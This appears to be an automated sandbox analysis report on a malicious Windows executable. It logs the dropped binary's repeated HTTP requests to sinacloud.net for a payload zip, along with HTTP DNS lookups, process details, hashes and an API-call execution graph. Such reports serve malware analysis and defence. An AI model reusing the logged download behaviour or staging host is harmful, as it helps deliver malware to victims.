                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 35 64 30 33 63 32 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 32 37 2d 30 38 39 34 65 66 66 39 33 38 39 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>345d03c2-2412-0521-2727-0894eff93894</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                104192.168.2.55008627.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:29.231812000 CET241OUTGET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:31.102735996 CET509INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:21 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 74127bac-2412-0521-2730-0894eff93275
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 31 32 37 62 61 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 33 30 2d 30 38 39 34 65 66 66 39 33 32 37 35 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>74127bac-2412-0521-2730-0894eff93275</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                105192.168.2.55008727.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:31.227541924 CET241OUTGET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:32.978173018 CET509INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:30 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32cd48c3-2412-0521-2732-b4055d7528f1
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 63 64 34 38 63 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 33 32 2d 62 34 30 35 35 64 37 35 32 38 66 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>32cd48c3-2412-0521-2732-b4055d7528f1</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                106192.168.2.550088114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:33.126008034 CET82OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                107192.168.2.550089182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:33.130351067 CET82OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:27:35.257442951 CET131INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                108192.168.2.550090119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:33.133829117 CET79OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:27:34.363368988 CET131INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 34 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 37 39
                                                                                Data Ascii: 27.221.16.149;27.221.16.179


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                109192.168.2.55009127.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:34.489578009 CET241OUTGET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                110192.168.2.55009227.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:56.506449938 CET241OUTGET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:58.260540009 CET509INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:55 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32da782c-2412-0521-2757-b4055d752cc6
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 64 61 37 38 32 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 35 37 2d 62 34 30 35 35 64 37 35 32 63 63 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>32da782c-2412-0521-2757-b4055d752cc6</RequestId></Error>0


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:08:25:01
                                                                                Start date:05/12/2024
                                                                                Path:C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe"
                                                                                Imagebase:0xed0000
                                                                                File size:21'878'788 bytes
                                                                                MD5 hash:79E8C7FC08846104C300079E8F9CFFF2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:08:25:04
                                                                                Start date:05/12/2024
                                                                                Path:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\google\D74384FB8D2C9.exe" WfCSiyl7KCmSL4J0fXwpklp7KYEqfR6ShFd+QzmL6nTfLzmL6+rr5jmL5ejq5jx7JntO
                                                                                Imagebase:0x400000
                                                                                File size:1'168'440 bytes
                                                                                MD5 hash:0D79B45E55C20F14D9614596247B7DF2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Borland Delphi
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 13%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:3
                                                                                Start time:08:25:07
                                                                                Start date:05/12/2024
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff7e52b0000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:7.9%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:9.3%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:157
                                                                                  execution_graph 86169 40d840 _memset _memset _sprintf 86170 40d8ba 86169->86170 86178 40d640 86170->86178 86179 40d662 86178->86179 86180 40d683 _strlen 86179->86180 86181 40d677 86179->86181 86180->86181 86237 404740 86181->86237 86183 40d6a8 86184 40d6b1 86183->86184 86185 40d6bd _strlen 86183->86185 86244 4068a0 86184->86244 86185->86184 86187 40d6e4 86252 406a10 86187->86252 86190 40d71c 86256 404700 86190->86256 86193 40d764 _strlen 86195 40d741 86193->86195 86195->86193 86196 404740 codecvt 7 API calls 86195->86196 86199 40d806 86195->86199 86200 40d7a9 _strlen 86195->86200 86204 4068a0 7 API calls 86195->86204 86260 40eee0 5 API calls codecvt 86195->86260 86196->86195 86201 404700 codecvt 4 API calls 86199->86201 86200->86195 86204->86195 86238 40475c codecvt 86237->86238 86243 40474f codecvt 86237->86243 86239 4047c7 86238->86239 86261 404930 86238->86261 86241 404805 _memcpy_s 86239->86241 86242 4047dd _memmove_s 86239->86242 86241->86243 86242->86243 86243->86183 86245 4068d1 codecvt 86244->86245 86246 406907 _strlen 86245->86246 86248 4068fe codecvt 86245->86248 86246->86248 86247 40699b _memcpy_s 86251 4069db codecvt 86247->86251 86248->86247 86249 404930 codecvt 5 API calls 86248->86249 86249->86247 86251->86187 86253 406a52 FindFirstFileA 86252->86253 86254 406a46 86252->86254 86253->86190 86253->86195 86255 404930 codecvt 5 API calls 86254->86255 86255->86253 86257 404726 86256->86257 86258 40473b 86256->86258 86260->86195 86262 40494f 86261->86262 86263 404977 codecvt 86262->86263 86265 404ab0 86262->86265 86263->86239 86266 404ade 86265->86266 86271 449e1f 86266->86271 86267 404af3 codecvt 86268 404b17 _memcpy_s 86267->86268 86269 404b59 86268->86269 86269->86263 86272 449e33 86271->86272 86273 449e2f 86271->86273 86275 46a7e7 86272->86275 86273->86267 86276 46a886 _malloc 86275->86276 86279 46a7f9 __FF_MSGBANNER _malloc 86275->86279 86276->86273 86278 46a856 RtlAllocateHeap 86278->86279 86279->86276 86279->86278 86280 46a798 4 API calls 3 library calls 86279->86280 86280->86279 86316 4102c0 86317 4102d9 86316->86317 86320 4254e0 _memset 86317->86320 86327 420690 _memset 86320->86327 86328 42fd40 86329 42fd52 NtdllDefWindowProc_A 86328->86329 86330 42fd50 NtdllDefWindowProc_A 86328->86330 86331 42fd80 86329->86331 86330->86331 86333 4257c0 86334 4257e4 86333->86334 86340 447e56 86334->86340 86336 425860 86337 425864 SendMessageA SendMessageA 86336->86337 86338 4258b9 86336->86338 86339 4258b2 86337->86339 86339->86338 86341 447e69 86340->86341 86343 447e7a 86340->86343 86341->86343 86352 44a5b1 KiUserExceptionDispatcher task 86341->86352 86345 447ed3 86343->86345 86346 4443ff 86343->86346 86345->86336 86347 44440b 86346->86347 86353 45460d 86347->86353 86349 444424 86350 444432 CreateWindowExA 86349->86350 86351 44442e 86349->86351 86350->86351 86351->86345 86354 454618 86353->86354 86356 45461d ctype 86353->86356 86357 44a5b1 KiUserExceptionDispatcher task 86354->86357 86356->86349 86358 beac16e 86364 bead1d4 86358->86364 86360 beac187 86368 be9b9a4 ReadFile 86360->86368 86370 beacd54 86360->86370 86361 beac1a2 86365 bead1dd 86364->86365 86377 bead218 86365->86377 86367 bead1f9 86367->86360 86369 be9b9c1 86368->86369 86369->86361 86414 bead16c 86370->86414 86372 beacd7c 86376 bead16c SetFilePointer 86372->86376 86375 bead16c SetFilePointer 86375->86372 86378 bead233 86377->86378 86379 bead25a 86378->86379 86380 bead2c3 86378->86380 86406 be9b99c CreateFileA 86379->86406 86398 be9b920 86380->86398 86383 bead2cd 86385 bead2bc 86383->86385 86410 be9bb74 12 API calls 86383->86410 86384 bead264 86384->86385 86407 be9bb74 12 API calls 86384->86407 86402 be94c80 86385->86402 86389 bead2e8 GetLastError 86411 be9e4fc 12 API calls 86389->86411 86390 bead283 GetLastError 86408 be9e4fc 12 API calls 86390->86408 86394 bead29a 86409 be9ee0c 42 API calls 86394->86409 86395 bead2ff 86412 be9ee0c 42 API calls 86395->86412 86399 be9b973 86398->86399 86400 be9b934 86398->86400 86399->86383 86400->86399 86401 be9b96d CreateFileA 86400->86401 86401->86399 86403 be94c86 86402->86403 86404 be94cac 86403->86404 86413 be92dec 11 API calls 86403->86413 86404->86367 86406->86384 86407->86390 86408->86394 86409->86385 86410->86389 86411->86395 86412->86385 86413->86403 86417 be9b9fc SetFilePointer 86414->86417 86416 beacd67 86416->86375 86417->86416 86418 6a6e25e9 86424 6a6fe0d8 86418->86424 86425 6a6fe0e8 86424->86425 86426 6a6fe103 86424->86426 86454 6a701068 86425->86454 86435 6a6fdffd 86426->86435 86437 6a6fe009 ___FrameUnwindToState 86435->86437 86436 6a6fe01c 86438 6a701068 __cftof2_l 67 API calls 86436->86438 86437->86436 86439 6a6fe051 86437->86439 86440 6a6fe021 86438->86440 86458 6a708228 86439->86458 86499 6a700d34 6 API calls 2 library calls 86440->86499 86443 6a6fe056 86444 6a6fe05d 86443->86444 86445 6a6fe06a 86443->86445 86446 6a701068 __cftof2_l 67 API calls 86444->86446 86447 6a6fe091 86445->86447 86448 6a6fe071 86445->86448 86452 6a6fe031 ___FrameUnwindToState @_EH4_CallFilterFunc@8 86446->86452 86477 6a707f5f 86447->86477 86450 6a701068 __cftof2_l 67 API calls 86448->86450 86450->86452 86707 6a70580a GetLastError 86454->86707 86456 6a6fe0ed 86457 6a700d34 6 API calls 2 library calls 86456->86457 86459 6a708234 ___FrameUnwindToState 86458->86459 86501 6a705eed 86459->86501 86461 6a7082b7 86508 6a708357 86461->86508 86462 6a7082be 86542 6a706f7d 67 API calls _malloc 86462->86542 86465 6a70834c ___FrameUnwindToState 86465->86443 86466 6a7082c8 86466->86461 86543 6a708a89 InitializeCriticalSectionAndSpinCount ___FrameUnwindToState 86466->86543 86470 6a708242 86470->86461 86470->86462 86511 6a705e2a 86470->86511 86540 6a707ec2 68 API calls __lock 86470->86540 86541 6a707f30 LeaveCriticalSection LeaveCriticalSection _doexit 86470->86541 86471 6a7082ed 86472 6a7082f8 86471->86472 86473 6a70830b EnterCriticalSection 86471->86473 86544 6a6fe26f 67 API calls 7 library calls 86472->86544 86473->86461 86476 6a708300 86476->86461 86502 6a705f02 86501->86502 86503 6a705f15 EnterCriticalSection 86501->86503 86504 6a705e2a __mtinitlocknum 66 API calls 86502->86504 86503->86470 86505 6a705f08 86504->86505 86505->86503 86545 6a6fe361 67 API calls 3 library calls 86505->86545 86507 6a705f14 86507->86503 86546 6a705e13 LeaveCriticalSection 86508->86546 86510 6a70835e 86510->86465 86512 6a705e36 ___FrameUnwindToState 86511->86512 86513 6a705e46 86512->86513 86514 6a705e5e 86512->86514 86547 6a706c33 67 API calls 2 library calls 86513->86547 86515 6a705e6c ___FrameUnwindToState 86514->86515 86527 6a705e5c 86514->86527 86515->86470 86518 6a705e4b 86548 6a706a88 67 API calls 7 library calls 86518->86548 86519 6a705e77 86521 6a705e8d 86519->86521 86522 6a705e7e 86519->86522 86526 6a705eed __lock 67 API calls 86521->86526 86525 6a701068 __cftof2_l 67 API calls 86522->86525 86523 6a705e52 86549 6a6fe3b5 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86523->86549 86528 6a705e83 86525->86528 86529 6a705e94 86526->86529 86527->86514 86550 6a706f7d 67 API calls _malloc 86527->86550 86528->86515 86540->86470 86541->86470 86542->86466 86543->86471 86544->86476 86545->86507 86546->86510 86547->86518 86548->86523 86550->86519 86722 6a705695 TlsGetValue 86707->86722 86710 6a705877 SetLastError 86710->86456 86711 6a706fc2 __calloc_crt 64 API calls 86712 6a705835 86711->86712 86712->86710 86713 6a70583d 86712->86713 86727 6a7055fa 6 API calls __crt_waiting_on_module_handle 86713->86727 86715 6a70584f 86716 6a705856 86715->86716 86717 6a70586e 86715->86717 86728 6a705723 86716->86728 86747 6a6fe26f 67 API calls 7 library calls 86717->86747 86721 6a705874 86721->86710 86723 6a7056c5 86722->86723 86724 6a7056aa 86722->86724 86723->86710 86723->86711 86748 6a7055fa 6 API calls __crt_waiting_on_module_handle 86724->86748 86726 6a7056b5 TlsSetValue 86726->86723 86727->86715 86749 6a703174 86728->86749 86730 6a70572f GetModuleHandleW 86731 6a705746 86730->86731 86732 6a70573f 86730->86732 86734 6a705781 86731->86734 86735 6a70575d GetProcAddress GetProcAddress 86731->86735 86750 6a6fe331 Sleep GetModuleHandleW 86732->86750 86737 6a705eed __lock 63 API calls 86734->86737 86735->86734 86736 6a705745 86736->86731 86738 6a7057a0 InterlockedIncrement 86737->86738 86747->86721 86748->86726 86749->86730 86750->86736 86771 be97260 CreateMutexA 86772 46b6cd 86773 46b6db __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86772->86773 86774 46b6f9 __initterm_e 86773->86774 86775 46b70e 86774->86775 86778 46b733 __IsNonwritableInCurrentImage 86774->86778 86779 46a566 86775->86779 86782 46a52a 86779->86782 86781 46a573 __initterm 86781->86778 86783 46a536 86782->86783 86786 46a43f 86783->86786 86785 46a547 _Error_objects 86785->86781 86787 46a453 ___set_flsgetvalue 86786->86787 86792 46a4bb __onexit_nolock 86787->86792 86794 470315 4 API calls 3 library calls 86787->86794 86789 46a481 86790 46a4a5 86789->86790 86789->86792 86795 4760bf 5 API calls _realloc 86789->86795 86790->86792 86796 4760bf 5 API calls _realloc 86790->86796 86792->86785 86794->86789 86795->86790 86796->86792 86797 6a6dafe0 CreateToolhelp32Snapshot 86798 6a6db02a Process32First 86797->86798 86799 6a6db011 86797->86799 86800 6a6db072 86798->86800 86805 6a6db039 86798->86805 86808 6a6fd7eb 86799->86808 86802 6a6fd7eb ___ansicp 5 API calls 86800->86802 86804 6a6db091 86802->86804 86803 6a6db023 86805->86800 86807 6a6db063 Process32Next 86805->86807 86816 6a6fda9d 102 API calls 2 library calls 86805->86816 86807->86800 86807->86805 86809 6a6fd7f5 IsDebuggerPresent 86808->86809 86810 6a6fd7f3 86808->86810 86817 6a70d151 86809->86817 86810->86803 86813 6a704a7c SetUnhandledExceptionFilter UnhandledExceptionFilter 86814 6a704aa1 GetCurrentProcess TerminateProcess 86813->86814 86815 6a704a99 __invoke_watson 86813->86815 86814->86803 86815->86814 86816->86805 86817->86813 86818 6a70137f 86819 6a70138a 86818->86819 86820 6a70138f 86818->86820 86836 6a70d99d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 86819->86836 86824 6a701289 86820->86824 86823 6a70139d 86825 6a701295 ___FrameUnwindToState 86824->86825 86826 6a7012e2 86825->86826 86829 6a701332 ___FrameUnwindToState 86825->86829 86837 6a701154 86825->86837 86826->86829 86887 6a6ee04e 86826->86887 86829->86823 86831 6a701312 86831->86829 86833 6a701154 __CRT_INIT@12 156 API calls 86831->86833 86832 6a6ee04e ___DllMainCRTStartup 110 API calls 86834 6a701309 86832->86834 86833->86829 86835 6a701154 __CRT_INIT@12 156 API calls 86834->86835 86835->86831 86836->86820 86838 6a701163 86837->86838 86839 6a7011df 86837->86839 86891 6a7069e4 HeapCreate 86838->86891 86840 6a7011e5 86839->86840 86841 6a701216 86839->86841 86846 6a70116e 86840->86846 86848 6a701200 86840->86848 86902 6a6fe5fd 67 API calls _doexit 86840->86902 86843 6a701274 86841->86843 86844 6a70121b 86841->86844 86843->86846 86908 6a7059cc 79 API calls 2 library calls 86843->86908 86847 6a705695 ___set_flsgetvalue 8 API calls 86844->86847 86846->86826 86851 6a701220 86847->86851 86848->86846 86903 6a70d4e5 68 API calls __mtterm 86848->86903 86849 6a701175 86893 6a705a3a 78 API calls 8 library calls 86849->86893 86854 6a706fc2 __calloc_crt 67 API calls 86851->86854 86857 6a70122c 86854->86857 86855 6a70117a __RTC_Initialize 86864 6a70118a GetCommandLineA 86855->86864 86880 6a70117e 86855->86880 86857->86846 86859 6a701238 86857->86859 86858 6a70120a 86904 6a7056e6 70 API calls 2 library calls 86858->86904 86906 6a7055fa 6 API calls __crt_waiting_on_module_handle 86859->86906 86863 6a701183 86863->86846 86895 6a70d866 76 API calls 3 library calls 86864->86895 86865 6a70120f 86905 6a706a14 VirtualFree HeapFree HeapFree HeapDestroy 86865->86905 86867 6a70124a 86872 6a701251 86867->86872 86873 6a701268 86867->86873 86869 6a70119a 86896 6a70d291 72 API calls 3 library calls 86869->86896 86871 6a7011a4 86875 6a7011a8 86871->86875 86898 6a70d7ab 112 API calls 3 library calls 86871->86898 86876 6a705723 __getptd_noexit 67 API calls 86872->86876 86907 6a6fe26f 67 API calls 7 library calls 86873->86907 86897 6a7056e6 70 API calls 2 library calls 86875->86897 86879 6a701258 GetCurrentThreadId 86876->86879 86879->86846 86894 6a706a14 VirtualFree HeapFree HeapFree HeapDestroy 86880->86894 86881 6a7011b4 86882 6a7011c8 86881->86882 86899 6a70d533 111 API calls 6 library calls 86881->86899 86882->86863 86901 6a70d4e5 68 API calls __mtterm 86882->86901 86885 6a7011bd 86885->86882 86900 6a6fe420 74 API calls 5 library calls 86885->86900 86888 6a6ee05c 86887->86888 86889 6a6ee067 86887->86889 86888->86889 86909 6a6f3911 86888->86909 86889->86831 86889->86832 86892 6a701169 86891->86892 86892->86846 86892->86849 86893->86855 86894->86863 86895->86869 86896->86871 86897->86880 86898->86881 86899->86885 86900->86882 86901->86875 86902->86848 86903->86858 86904->86865 86905->86846 86906->86867 86907->86863 86908->86846 86914 6a6f3fbd 86909->86914 86911 6a6f3943 86911->86889 86913 6a6f3920 86913->86911 86926 6a6f3a79 8 API calls 2 library calls 86913->86926 86917 6a6f3fc9 __EH_prolog3 86914->86917 86916 6a6f4017 86927 6a6f39c8 EnterCriticalSection 86916->86927 86917->86916 86918 6a6f400c 86917->86918 86934 6a6ee232 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 86917->86934 86935 6a6f3cd3 TlsAlloc InitializeCriticalSection RaiseException ctype 86917->86935 86918->86916 86918->86917 86936 6a6f3bbb 90 API calls 2 library calls 86918->86936 86923 6a6f403d ctype 86923->86913 86924 6a6f402a 86937 6a6f3d7a 88 API calls 3 library calls 86924->86937 86926->86913 86928 6a6f3a0a LeaveCriticalSection 86927->86928 86929 6a6f39e3 86927->86929 86931 6a6f3a13 86928->86931 86929->86928 86930 6a6f39e8 TlsGetValue 86929->86930 86930->86928 86932 6a6f39f4 86930->86932 86931->86923 86931->86924 86932->86928 86933 6a6f39f9 LeaveCriticalSection 86932->86933 86933->86931 86934->86917 86935->86917 86936->86918 86937->86923 86938 40bc50 CreateFileA 86939 40bc7b 86938->86939 86940 40bc7f 86938->86940 86941 46a7e7 _malloc 4 API calls 86940->86941 86942 40bc97 86941->86942 86943 40bcb1 CloseHandle 86942->86943 86944 40bca3 CloseHandle 86942->86944 86946 40bce4 86943->86946 86947 40bcdb 86943->86947 86944->86939 86946->86939 86948 46a8b1 __setmbcp 4 API calls 86947->86948 86948->86946 86949 40f5d0 86952 409bf0 86949->86952 86951 40f5ec 86977 408640 86952->86977 86955 409c11 IWBE 86956 409c34 86955->86956 86970 409c1b 86955->86970 86957 409c60 86956->86957 86958 409c3d IHJDE 86956->86958 86981 44b132 __EH_prolog3 86957->86981 86958->86957 86958->86970 86960 409c74 86961 409c7d INSHDY 86960->86961 86963 409ca1 86960->86963 86961->86963 86961->86970 86962 409de1 _memset _memset _memset 86964 409e46 86962->86964 86963->86962 86963->86970 86970->86951 86978 408643 86977->86978 86979 408655 86978->86979 86980 408657 Sleep 86978->86980 86979->86955 86979->86956 86980->86978 86991 4428ed 86981->86991 86984 44b15f 86995 44b027 86984->86995 86989 44b17f 86989->86960 86993 4428f5 86991->86993 86992 46a7e7 _malloc 4 API calls 86992->86993 86993->86992 86994 442917 86993->86994 86994->86984 87005 44ab00 __EH_prolog3 86994->87005 86996 44b040 _memset 86995->86996 86997 44b03b 86995->86997 86999 44b054 86996->86999 87022 44a5b1 KiUserExceptionDispatcher task 86997->87022 87003 44b0b8 86999->87003 87006 46ff35 